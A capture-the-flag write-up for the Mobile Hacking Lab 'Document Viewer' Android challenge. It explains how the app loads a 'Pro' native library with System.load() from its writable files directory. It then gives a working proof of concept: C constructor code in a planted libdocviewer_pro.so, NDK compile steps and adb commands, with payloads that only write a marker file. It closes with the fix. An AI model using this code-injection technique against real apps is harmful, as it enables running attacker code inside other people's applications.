Document Viewer

Hello everyone, in this blog post I will try to explain my solution steps for the Document Viewer challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

  1. Install the app and open it.

  2. AndroidManifest.xml examination:

    1. The MainActivity is exported and declares an intent filter with the VIEW action, several schemes (file, http, https) and the MIME type application/pdf, so any other app, or a link opened in a browser, can hand it a URI to render.

  3. Let's analyze the MainActivity code:

    1. setLoadButtonListener(): sets up the button that lets the user pick and load a PDF file.

    2. handleIntent(): handles incoming intents, e.g. when another app opens a PDF file in this viewer.

    3. renderPdf(Uri uri): renders the selected or received PDF file for viewing.

    4. requestStoragePermissionAsync(Continuation<? super Boolean> continuation): requests storage permission (a Kotlin suspend function, hence the Continuation parameter in the decompiled Java).

  4. The important function here is loadProLibrary():

    1. Build.SUPPORTED_ABIS[0] gives the device's preferred ABI (e.g. arm64-v8a or x86_64).

    2. A File built from getApplicationContext().getFilesDir() and "native-libraries/" + abi is the path to a folder inside the app's private internal storage (/data/data/com.mobilehackinglab.documentviewer/files/native-libraries/<abi>) where the native libraries are expected to live.

    3. It then appends the file name of the Pro library, libdocviewer_pro.so, to get the full path (libraryFile).

    4. System.load(libraryFile.getAbsolutePath()) loads whatever file sits at that path into the app's process. Unlike System.loadLibrary(), which resolves a short name inside the APK's own lib directory, System.load() takes an arbitrary file path, and the dynamic linker runs the library's constructors as part of loading it.

    5. If the load succeeds, it enables the "Pro" features by setting this.proFeaturesEnabled = true. The security problem is the location: the library is loaded from the app's writable files directory rather than from the read-only APK, so anyone who can write there controls code that runs inside the app's process.

  5. After decompiling the app, I could not find any folder containing the libraries.

  6. The exploit is therefore to build a malicious libdocviewer_pro.so and drop it at /data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64/ (x86_64 being the ABI of the test device).

  7. When the app tries to load this library, the code in it runs. If the rce.txt file appears afterwards, the exploit succeeded and we have code execution inside the app:

    // Minimal payload: a shared-library constructor runs during dlopen(),
    // which is what System.load() does, so the command executes as soon as
    // the app loads libdocviewer_pro.so; no exported function has to be called.
    #include <stdlib.h>

    __attribute__((constructor)) void execute_command(void) {
        // Marker file proving code ran inside the app's process (same uid as the app).
        system("touch /data/data/com.mobilehackinglab.documentviewer/rce.txt");
    }
  8. Then compile the C code into a native shared library (libdocviewer_pro.so) for the device's ABI.

  9. Then push it to the path above, open the app, and check for rce.txt: it is created, and the exploit succeeds.
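The following is an added example, not the write-up's own payload: it generalizes the `touch` payload above so that the marker file records the uid, pid and command line of the process that loaded the library, which proves the code ran inside the Document Viewer process and not somewhere else. It uses raw syscalls instead of `system()`, so no shell has to be spawned from the app's SELinux domain. The function names (`write_marker`, `marker_valid`, `on_load`), the `MARKER_PATH` constant and the build/deploy commands in the header comment are my assumptions; the commands assume a standard Android NDK toolchain and a rooted device or emulator.

```c
/*
 * Added example (not the write-up's payload): a libdocviewer_pro.so replacement
 * whose constructor records which process loaded it.
 *
 * Assumed build/deploy steps (NDK r19+ toolchain layout, x86_64 target as in the
 * write-up; use aarch64-linux-android21-clang for an arm64-v8a device):
 *   $NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/x86_64-linux-android21-clang \
 *       -shared -fPIC -o libdocviewer_pro.so payload.c
 *   adb root
 *   adb shell mkdir -p /data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64
 *   adb push libdocviewer_pro.so /data/data/com.mobilehackinglab.documentviewer/files/native-libraries/x86_64/
 *   adb shell cat /data/data/com.mobilehackinglab.documentviewer/rce.txt   # after opening the app
 */
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Marker path from the challenge; on a host build the open() simply fails. */
#define MARKER_PATH "/data/data/com.mobilehackinglab.documentviewer/rce.txt"

/* Write "uid=<n> pid=<n> cmdline=<argv0>\n" to path. Returns 0 on success, -1 on error.
 * Only open/read/write are used: no shell, nothing for exec-related policy to block. */
int write_marker(const char *path) {
    char cmdline[256] = "?";
    int fd = open("/proc/self/cmdline", O_RDONLY);
    if (fd >= 0) {
        ssize_t n = read(fd, cmdline, sizeof(cmdline) - 1);
        close(fd);
        if (n > 0) cmdline[n] = '\0';   /* first NUL-separated string is argv[0] / package name */
        else strcpy(cmdline, "?");
    }

    char buf[512];
    int len = snprintf(buf, sizeof(buf), "uid=%u pid=%d cmdline=%s\n",
                       (unsigned)getuid(), (int)getpid(), cmdline);
    if (len < 0) return -1;
    if ((size_t)len >= sizeof(buf)) len = (int)(sizeof(buf) - 1);

    fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t w = write(fd, buf, (size_t)len);
    close(fd);
    return (w == (ssize_t)len) ? 0 : -1;
}

/* Return 1 if the marker exists and starts with "uid=", else 0. */
int marker_valid(const char *path) {
    char head[4] = {0};
    int fd = open(path, O_RDONLY);
    if (fd < 0) return 0;
    ssize_t n = read(fd, head, sizeof(head));
    close(fd);
    return (n == 4 && memcmp(head, "uid=", 4) == 0) ? 1 : 0;
}

/* Runs inside dlopen(): System.load() maps the file and the dynamic linker calls
 * every constructor before returning to Java, so the payload fires regardless of
 * which symbols the app expects libdocviewer_pro.so to export. Errors are ignored
 * so the load itself does not abort. */
static __attribute__((constructor)) void on_load(void) {
    (void)write_marker(MARKER_PATH);
}

/* Host-side self-check: same payload against a local file. */
int main(void) {
    const char *p = "docviewer_marker.txt";
    if (write_marker(p) != 0) { perror("write_marker"); return 1; }
    printf("marker written to %s (valid=%d)\n", p, marker_valid(p));
    return 0;
}
```

Two caveats a practitioner will hit: /data/data/<package>/files is private to the app, so pushing into it needs root (or `run-as` on a debuggable build), which is why the challenge is done on a rooted emulator; and the toolchain must match Build.SUPPORTED_ABIS[0], since System.load() will refuse a library built for another ABI. On the app side the fix is to ship the library inside the APK and load it with System.loadLibrary(), or at least verify the file (signature or pinned hash) before handing its path to System.load().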
